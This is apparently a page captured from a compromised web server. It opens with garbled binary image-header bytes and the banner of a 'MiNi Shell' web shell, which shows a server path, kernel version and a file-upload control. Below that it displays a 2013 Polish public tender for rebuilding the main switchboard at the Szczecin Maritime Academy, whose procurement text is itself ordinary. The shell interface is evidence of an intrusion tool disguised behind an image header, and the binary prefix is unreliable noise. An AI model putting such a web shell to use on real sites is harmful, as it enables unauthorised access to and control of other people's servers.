JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130130/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130130/40594-N-2013.html

<p class="kh_header"><b>Szczecin: Przebudowa rozdzielni głównej 2RG i struktury zasilania WLZ wraz z węzłami zasilania, tablicami komputerowymi, tablicami obwodów podstawowych, tablicami napięcia gwarantowanego i tablicami technologicznymi w Budynku Głównym nr 2 Akademii Morskiej w Szczecinie - przy ul. Wały Chrobrego 1-2.</b><br>
<b>Numer ogłoszenia: 40594 - 2013; data zamieszczenia: 30.01.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Akademia Morska w Szczecinie , ul. Wały Chrobrego 1/2, 70-500 Szczecin, woj. zachodniopomorskie, tel. 91 4809400, faks 91 4809575.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.am.szczecin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa rozdzielni głównej 2RG i struktury zasilania WLZ wraz z węzłami zasilania, tablicami komputerowymi, tablicami obwodów podstawowych, tablicami napięcia gwarantowanego i tablicami technologicznymi w Budynku Głównym nr 2 Akademii Morskiej w Szczecinie - przy ul. Wały Chrobrego 1-2..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem Zamówienia są między innymi:
1)Przebudowa przyłącza elektrycznego i układu pomiarowego w oparciu o istniejący projekt wykonawczy Przebudowa rozdzielni głównej 2RG i struktury zasilania WLZ wraz węzłami zasilania, tablicami komputerowymi, tablicami obwodów podstawowych, tablicami napięcia gwarantowanego i tablicami technologicznymi, w Budynku Głównym nr 2 Akademii Morskiej w Szczecinie przy ul. Wały Chrobrego 1-2 
2)Przebudowa istniejącego przyłącza. Budowa układu pomiarowego (pomiar półpośredni) przy przyłączu, po uzyskaniu wytycznych i uzgodnień z zakładem energetycznym ENEA Operator Sp. z o.o. 
3)Demontaż istniejącego układu pomiarowego półpośredniego w rozdzielni 2RG.
4)Wykonanie podziału pomieszczenia rozdzielni głównej 2RG. Wymiana drzwi wejściowych na przeciwpożarowe w klasie odporności ogniowej EI60. Wyburzenie schodów i remont wydzielonej części pomieszczenia rozdzielni 2RG. Uzupełnienie tynków ścian oraz wykonanie nowej posadzki, wyrównanie, malowanie dwukrotne ścian i sufitów. Zabezpieczenie istniejącego kanału kablowego (docelowo przeznaczony do likwidacji).
5)Przeniesienie rejestratora CCTV z pomieszczenia rozdzielni 2RG do pomieszczenia nr 16. Prace należy prowadzić, pod nadzorem firmy, sprawdzającej nadzór nad tymi instalacjami w ramach umowy z Akademią Morską w Szczecinie.
6)Ustawienie podwójnego cokołu pod rozdzielnie 2RG, wypoziomowanie. Montaż nowej rozdzielni głównej 2RG (celki nr 1 i nr 2), w wyremontowanej części i przejściowe podłączenie istniejących kabli odbiorowych do wyznaczonych celek i sekcji.
7)Montaż przekładników prądowych. Montaż analizatorów parametrów sieci na głównym zasilaniu dla sekcji nr 1, sekcji nr 2.
8)Odłączanie od istniejącej rozdzielnicy 2RG pojedynczo kabli odbiorowych i ich oznaczanie po zidentyfikowaniu obecnego przeznaczenia - funkcji.
9)Wykonanie tymczasowych przełączeń istniejących kabli do częściowo wykonanej nowej rozdzielni 2RG w wyremontowanej części pomieszczenia rozdzielni. Mufowanie (sztukowanie) istniejących kabli odbiorowych przewidzianych do zachowania, odcinkami kilkumetrowymi, które umożliwią podłączenie do nowej rozdzielni głównej 2RG.
10)Po wykonaniu całkowitego przełączenia wszystkich kabli do częściowo wykonanej, nowej rozdzielni głównej 2RG (sekcji nr 1, sekcji nr 2), demontaż istniejących instalacji elektrycznych w pomieszczeniu rozdzielni głównej 2RG. Demontaż konstrukcji istniejących rozdzielni, pojedynczo poszczególnymi celkami.
11)Remont wydzielonej części pomieszczenia rozdzielni głównej po demontażu istniejącej 2RG. Uzupełnienie tynków ścian oraz wykonanie nowej posadzki, wyrównanie, malowanie dwukrotne ścian i sufitów. Likwidacja istniejącego kanału kablowego.
12)Ustawienie podwójnego cokołu pod pozostałą część budowanej rozdzielni 2RG, wypoziomowanie. Kompletacja i montaż pozostałych celek rozdzielni 2RG.
13)Ułożenie mostów kablowych między celką zasilającą a celkami sekcyjnymi.
14)Ułożenie mostków sterowniczych między celkami i sekcjami.
15)Przełączenie kabli zasilających do docelowych pół zasilania w celkach rozdzielni 2RG.
16)Podwieszenie kanałów kablowych do sufitu - oraz wykonanie instalacji oświetleniowej i potrzeb własnych dla 2RG.
17)Podwieszenie kanałów kablowych do sufitu - oraz wykonanie instalacji oświetlenia w pomieszczeniu rozdzielni głównej 2RG
18)Montaż przekładników prądowych. Montaż analizatorów parametrów sieci na głównym zasilaniu dla sekcji nr 3 i sekcji nr 4.
19)Przeprowadzenie prób funkcjonalnych, pomiary ochrony przeciwporażeniowej oraz izolacji obwodów, natężenia oświetlenia w pomieszczeniu rozdzielni 2RG.
20)Wyposażenie rozdzielni głównej 2RG w osprzęt i narzędzia jak dla pomieszczenia ruchu elektrycznego nN. 
21)Po wykonaniu pomiarów i analizy parametrów sieci dobór i montaż kompensatora mocy biernej wraz z automatycznym regulatorem i niezbędnym oprzętem (przekładniki, zabezpieczenia, regulator mocy biernej, bateria kondensatorów, dławiki indukcyjne, filtry wyższych harmonicznych) do współpracy z rozdzielnią 2RG. Przeprowadzenie prób funkcjonalnych działania kompensatora i wszystkich niezbędnych pomiarów powykonawczych. 
22)Zamawiający wyłączył z zakresu niniejszej specyfikacji STWiOR wyposażenie rozdzielni głównej 2RG w system monitoringu obciążeń energetycznych, baterie kompensacyjną dobraną według istniejącego projektu, stacjonarny system monitoringu stanu izolacji, sygnalizację zdalczyną, instalację systemu baterii centralnej i UPS.
23)Przeprowadzenie prób funkcjonalnych, pomiary ochrony przeciwporażeniowej oraz izolacji obwodów, natężenia oświetlenia w pomieszczeniu rozdzielni 2RG.
24)Wyposażenie rozdzielni głównej 2RG w osprzęt i narzędzia jak dla pomieszczenia ruchu elektrycznego nN.
25)Wykonanie dokumentacji powykonawczej, z naniesieniem wszystkich wprowadzonych zmian i uzyskaniem ich akceptacji (na etapie planowania wprowadzenia zamian, po wcześniejszej akceptacji inwestora) przez projektantów.
26)Opracowanie instrukcji eksploatacji i obsługi rozdzielni głównej 2RG
27)Budowa szachtów pionowych dla kabli i przewodów prowadzonych w pionie i doprowadzenia ich do węzłów zasilania 2WZ00.4, 2WZ0.4, 2WZ1.4, 2WZ2.4, 2WZ3.4,
28)Budowa szachtów poziomych dla kabli i przewodów prowadzonych w poziomie i doprowadzenia ich od węzłów zasilania 2WZ00.4, 2WZ0.4, 2WZ1.4, 2WZ2.4, 2WZ3.4 do wybranych tablic piętrowych i pozostałych odbiorów, na poszczególnych kondygnacjach,
29)Budowa węzłów zasilania 2WZ00.4, 2WZ0.4, 2WZ1.4, 2WZ2.4, 2WZ3.4 na poszczególnych kondygnacjach, w powiązaniu z szachtami pionowymi.
30)Montaż tablic 2TP, 2TK w powiązaniu z właściwymi węzłami zasilania 2WZ00.4, 2WZ0.4, 2WZ1.4, 2WZ2.4, 2WZ3.4 na poszczególnych kondygnacjach.
31)Rozprowadzenie kabli i przewodów zasilających:
- Węzły zasilania 2WZ00.4, 2WZ0.4, 2WZ1.4, 2WZ2.4, 2WZ3.4
- Tablice piętrowe obwodów ogólnych i komputerowych 2TP00.4.1, 2TK00.4.1, 2TP04.1, 2TK0.4.1, 2TK1.4.1, 2TP2.4.1, 2TK2.4.1, 2TP2.4.1, 2TK2.4.1, 2TP3.4.1, 2TK3.4.1.
- Istniejące tablice piętrowe nr 2T0018, 2Tg04, 2T08, 2T09, 2T2.8, 2T3.15, 2T3.16, 2T3.17

Zamawiający wyłączył z realizacji następujące prace 
a)Dla rozdzielni głównej 2RG  
- Sygnalizacja zdalczynna.
- System monitorowania prądów różnicowych i upływowych
- Instalacja systemu baterii centralnej
- UPS
- bateria kompensacyjna dobraną według istniejącego projektu - realizacja wg 1.4.u.
b)Dla szachów, linii WLZ, węzłów zasilania i piętrowych  
- Linie WLZ dla rozdzielni 2RG - realizacja częściowa tylko dla szachtu                 nr 4
- Budowa i montaż węzłów - realizacja częściowa tylko dla 2WZ00.4, 2WZ0.4, 2WZ1.4, 2WZ2.4, 2WZ3.4
- Montaż tablic piętrowych obwodów ogólnych i komputerowych - realizacja częściowa tylko tablic nr 2TP00.4.1, 2TK00.4.1, 2TP04.1, 2TK0.4.1, 2TK1.4.1, 2TP2.4.1, 2TK2.4.1, 2TP2.4.1, 2TK2.4.1, 2TP3.4.1, 2TK3.4.1.
- Zasilanie istniejących tablic, w tym tablic technologicznych - realizacja częściowa tylko dla tablic nr 2T0018, 2Tg04, 2T08, 2T09, 2T2.8, 2T3.15, 2T3.16, 2T3.17.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.31.73.00-5, 45.31.53.00-1, 45.31.60.00-5, 45.31.70.00-2, 45.31.11.00-1, 45.31.22.00-9, 45.31.21.00-8, 45.31.00.00-3, 45.31.12.00-2, 45.31.56.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.07.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.Wymagane wadium określono w stosunku do wartości zamówienia i wynosi 15 000,00 zł (słownie: piętnaście tysięcy złotych 00/100).
2.Wadium może być wnoszone w jednej lub kilku następujących formach: 
1)pieniądzu na konto Zamawiającego: 16 1240 1864 1111 0000 2205 5615 z dopiskiem na przelewie: Wadium do przetargu nr AR/01/2013 na przebudowę  rozdzielni głównej 2RG i struktury zasilania WLZ wraz z węzłami zasilania, tablicami komputerowymi, tablicami obwodów podstawowych, tablicami napięcia gwarantowanego i tablicami technologicznymi w Budynku Głównym nr 2 Akademii Morskiej w Szczecinie - przy ul. Wały Chrobrego 1-2
2)poręczeniach bankowych lub poręczeń spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
3)gwarancjach bankowych; 
4)gwarancjach ubezpieczeniowych; 
5)poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r. Nr 42, poz. 275, z 2008 r. Nr 116, poz. 730 i 732 i Nr 227, poz. 1505 oraz z 2010 r. Nr 96, poz. 620). 
3.Wadium wnosi się przed upływem terminu składania ofert, w szczególności wadium w formie pieniężnej winno wpłynąć na konto Zamawiającego przed upływem terminu składania ofert. 
4.W przypadku wnoszenia wadium w innej formie niż pieniężna, Wykonawca dołącza do oferty oryginalny dokument wadialny. Z postępowania o udzielenie zamówienia publicznego wyklucza się Wykonawców, którzy nie wniosą wadium przed upływem terminu składania ofert.
5.Wadium wniesione w formie innej niż pieniężna winno obowiązywać od dnia składania ofert (a nie od dnia następnego) przez cały okres związania ofertą, zgodnie z art. 85 ustawy PZP.
6.W przypadku, gdy Wykonawca wnosi wadium w formie gwarancji bankowej lub gwarancji ubezpieczeniowej z treści tych gwarancji musi w szczególności jednoznacznie wynikać zobowiązanie gwaranta do zapłaty całej kwoty wadium zawierające oświadczenie, że Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli:
1) Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy P.z.p. nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 P.z.p. lub pełnomocnictw,
2) Wykonawca, którego oferta została wybrana:
1. odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,
2. nie wniósł wymaganego zabezpieczenia należytego wykonania umowy,
3.zawarcie umowy w sprawie zmówienia publicznego stało się niemożliwe 
z przyczyn leżących po stronie wykonawcy.
7.W przypadku składania przez Wykonawcę wadium w formie gwarancji bankowej lub ubezpieczeniowej, gwarancja ma być co najmniej: bezwarunkowa, nieodwołalna i płatna na pierwsze pisemne żądanie Zamawiającego. Gwarancja ma być sporządzona zgodnie z obowiązującym prawem i winna zawierać następujące elementy:
b) nazwę dającego zlecenie (Wykonawcy), beneficjanta gwarancji (Zamawiającego), gwaranta (banku lub instytucji ubezpieczeniowej udzielających gwarancji) oraz wskazanie ich siedzib,
c) oznaczenie postępowania,
d) określenie przedmiotu postępowania,
e) określenie wierzytelności, która ma być zabezpieczona gwarancją,
f) kwotę gwarancji,
g) termin ważności gwarancji,
h) zobowiązanie gwaranta do zapłacenia kwoty gwarancji na pierwsze pisemne żądanie Zamawiającego w sytuacjach opisanych w art. 46 ust. 4a i ust. 5 P.z.p.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.Warunek w rozumieniu Zamawiającego spełni Wykonawca, który wykaże wykonanie co najmniej 2 robót budowlanych w branży elektrycznej polegające na wykonaniu instalacji elektrycznych m.in. przebudowie rozdzielni głównej, wymianie linii WLZ w obiektach użyteczności publicznej o kubaturze powyżej 25 000 m3, w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie); 2. Ocena spełnienia powyższego warunku nastąpi w następujący sposób: Zamawiający zbada obecność i prawidłowość każdego wymaganego dokumentu i oświadczenia, a także czy wymagany dokument i oświadczenie potwierdza spełnianie waruku nie później niż na dzień składanie ofert. Zamawiający dokona formalnej oceny spełniania warunków udziału w postepowaniu w oparciu o analizę oświadczeń lub dokumentów załączonych do oferty zgodnie z formułą: spełnia/nie spełnia. 
3. W rozdziale IX SIWZ dotyczacym wykazu oświadczeń lub dokumentów, jakie muszą dostarczyć Wykonawcy w celu potwierdzenia spełnienia warunków udziału w postepowaniu Zamawiający szczegółowo wskazuje, jakich oświadczen lub dokumentów żąda od Wykonawcy.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. Warunek w rozumieniu Zamawiającego spełni Wykonawca, który będzie dysponował:
a) co najmniej 1 (jedną) osobą uprawnioną zgodnie z wymogami ustawy Prawo budowlane  (Dz. U. z 2010 r. Nr 243, poz. 1623 z późniejszymi zmianami) do pełnienia funkcji kierownika robót o specjalności konstrukcyjno-budowlanej bez ograniczeń lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów, a które uprawniają do pełnienia funkcji kierownika robót konstrukcyjno-budowlanej. Osoba wskazana musi wykazać się minimum 5-letnią praktyką zawodową na budowie oraz posiadać uprawnienia do prowadzenie robót budowlanych, badań konserwatorskich, badań architektonicznych i innych działań przy zabytku wpisanym do rejestru zabytków oraz badań archeologicznych określonych rozporządzeniem Ministra Kultury I Dziedzictwa Narodowego z dnia 27 lipca 2011r. W sprawie prowadzenia prac konserwatorskich, prac restauratorskich, robót budowlanych, badań konserwatorskich, badań architektonicznych i innych działań przy zabytku wpisanym do rejestru zabytków oraz badań archeologicznych (Dz. U. Nr 165, poz. 987) - w skrócie Rozporządzenie z dnia 27 lipca 2011r.
b) co najmniej 1 (jedną) osobą posiadającą uprawnienia budowlane do kierowania robotami elektrycznymi w specjalności instalacyjnej bez ograniczeń w zakresie instalacji i urządzeń elektrycznych i elektroenergetycznych lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów, a które uprawniają do pełnienia funkcji kierownika robót elektrycznych w zakresie instalacji elektrycznych i urządzeń elektroenergetycznych. Osoba wskazana do pełnienia funkcji kierownika musi wykazać się 5-letnią praktyką zawodową na budowie.
c) co najmniej 10 (dziesięcioma) osobami posiadającymi świadectwo kwalifikacyjne uprawniające do eksploatacji urządzeń, instalacji i sieci elektroenergetycznych o napięciu do 1 kV;</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie</li>

</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>W celu potwierdzenia, że oferowane roboty budowlane odpowiadają wymaganiom określonym przez Zamawiającego, Zamawiający żąda dołączenia do oferty opisu przedmiotu zamówienia (np. w formie kart katalogowych itp.) potwierdzającego spełnianie wymagań określonych przez Zamawiającego w SIWZ dla następujących oferowanych przez Wykonawcę materiałów do wykonania przedmiotowych robót:
1)Celka aparatowa rozdzielcza 2.000 x 650 x 500 mm z drzwiczkami pełnymi,                 z podwójnym cokołem 10 cm, z kompletem wsporników i maskownic.
2)Przedział kablowy 2.000 x 400 x 500 mm, z drzwiczkami pełnymi i podwójnym cokołem 10 cm, z kompletem wsporników i maskownic.
3)Systemowy analizator parametrów elektrycznych, z wyświetlaczem LCD (Uf, Umf, If, F, cos f, S, P, Q, E harmoniczne do 31-ej, wartości chwilowe, średnie, maksymalne) programowalne progi, wyjścia przekaźnikowe, RS485, RS232.
4)Automatyczny kompensator mocy biernej z dławikami wyższych harmonicznych 80 kVAr o stopniach regulacji (1 x 6, 25 + 2 x 12, 5 + 2 x 25) kVAr. 
5)Ogranicznik przepięć w klasie B+C (1+2) 3 - bieg. z NPE, Uc = 255 V, z sygnalizacją zadziałania, stykiem 1p, prąd udarowy Iimp = 100 kA, poziom ochrony napięciowej Up < 1,3 kV, wytrzymałość zwarciowa Izw = 25 kA.
